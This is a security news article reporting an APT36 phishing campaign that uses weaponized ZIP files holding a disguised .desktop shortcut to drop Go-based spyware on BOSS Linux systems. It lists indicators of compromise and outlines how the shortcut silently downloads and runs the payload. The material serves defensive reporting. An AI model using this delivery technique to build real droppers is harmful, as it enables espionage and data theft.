APT36 Attacking BOSS Linux Systems With Weaponized ZIP Files to Steal Sensitive Data

Pakistan-based threat actor APT36, also known as Transparent Tribe, has significantly evolved its cyber-espionage capabilities by launching a sophisticated campaign specifically targeting Indian defense personnel through weaponized ZIP files designed to compromise BOSS Linux systems. 

This development marks a notable shift in the group’s operational tactics, moving from traditional Windows-based attacks to Linux-focused infiltration methods that exploit the widespread use of BOSS Linux within Indian government agencies.

Key Takeaways
1. APT36, a Pakistan-based threat actor, shifts from Windows to Linux-specific attacks against government systems.
2. Phishing emails contain .desktop files that show decoy presentations while installing BOSS.elf payload.
3. Features system reconnaissance, screenshot capture, and persistent C2 communication at 101.99.92.182:12520.
4. Organizations must enhance email filtering, disable untrusted .desktop execution, and deploy Linux-specific detection tools.

Phishing Technique Exploits Linux Desktop Files

CYFIRMA reports that the attack campaign employs a multi-stage infiltration process that begins with carefully crafted phishing emails containing ZIP file attachments named “Cyber-Security-Advisory.zip.” 

Once extracted, the archive reveals a malicious .desktop file identified as “Cyber-Security-Advisory.desktop” with MD5 hash 6eb04445cad300c2878e8fbd3cb60b52. 

This Linux shortcut file contains sophisticated command sequences designed to execute silently without user detection.

The malicious .desktop file utilizes several key parameters: Type=Application ensures system execution, Terminal=false prevents visible terminal windows, and Icon=libreoffice-impress disguises the file as a legitimate presentation. 

The embedded Bash commands change the working directory to /tmp and execute dual curl commands. 

The first downloads “slide.pptx” from the attacker-controlled domain sorlastore.com, which despite its filename extension, contains an HTML iframe displaying a decoy blog page. 

Simultaneously, a second curl command downloads the primary payload, a malicious ELF binary named BOSS.elf (MD5: 18cf1e3be0e95be666c11d1dbde4588e), which is saved locally as “client.elf” and executed using nohup for persistent background operation.

Advanced Go-Based Malware Capabilities

The Go-language-based malware demonstrates advanced capabilities across multiple attack vectors. 

Static analysis reveals extensive reconnaissance functions including system hostname identification, CPU and RAM profiling, and runlevel inspection through systemctl commands. 

The malware employs main.junkcalc2 for activity logging and evasion techniques, while Main.getDrives and os.readDir functions enable comprehensive file system discovery and data collection.

Command and control operations utilize main.loadConfig to retrieve server details, establishing TCP connections to IP address 101.99.92[.]182:12520. 

The malware maintains persistent communication through setKeepAlive and setKeepAlivePeriod functions, automatically attempting reconnection every 30 seconds.

Data collection capabilities include the “github.com/kbinani/screenshot” library for desktop capture and main.sendResponse function for exfiltrating various data types, including files, command outputs, and system information.

The campaign aligns with multiple MITRE ATT&CK framework techniques, including T1566 (Phishing), T1543 (Create or Modify System Process), and T1071 (Application Layer Protocol), demonstrating sophisticated operational security. 

Organizations utilizing BOSS Linux systems should immediately implement enhanced email filtering, disable .desktop file execution from untrusted sources, and deploy endpoint detection capabilities specifically configured for Linux-based threats.

Investigate live malware behavior, trace every step of an attack, and make faster, smarter security decisions -> Try ANY.RUN now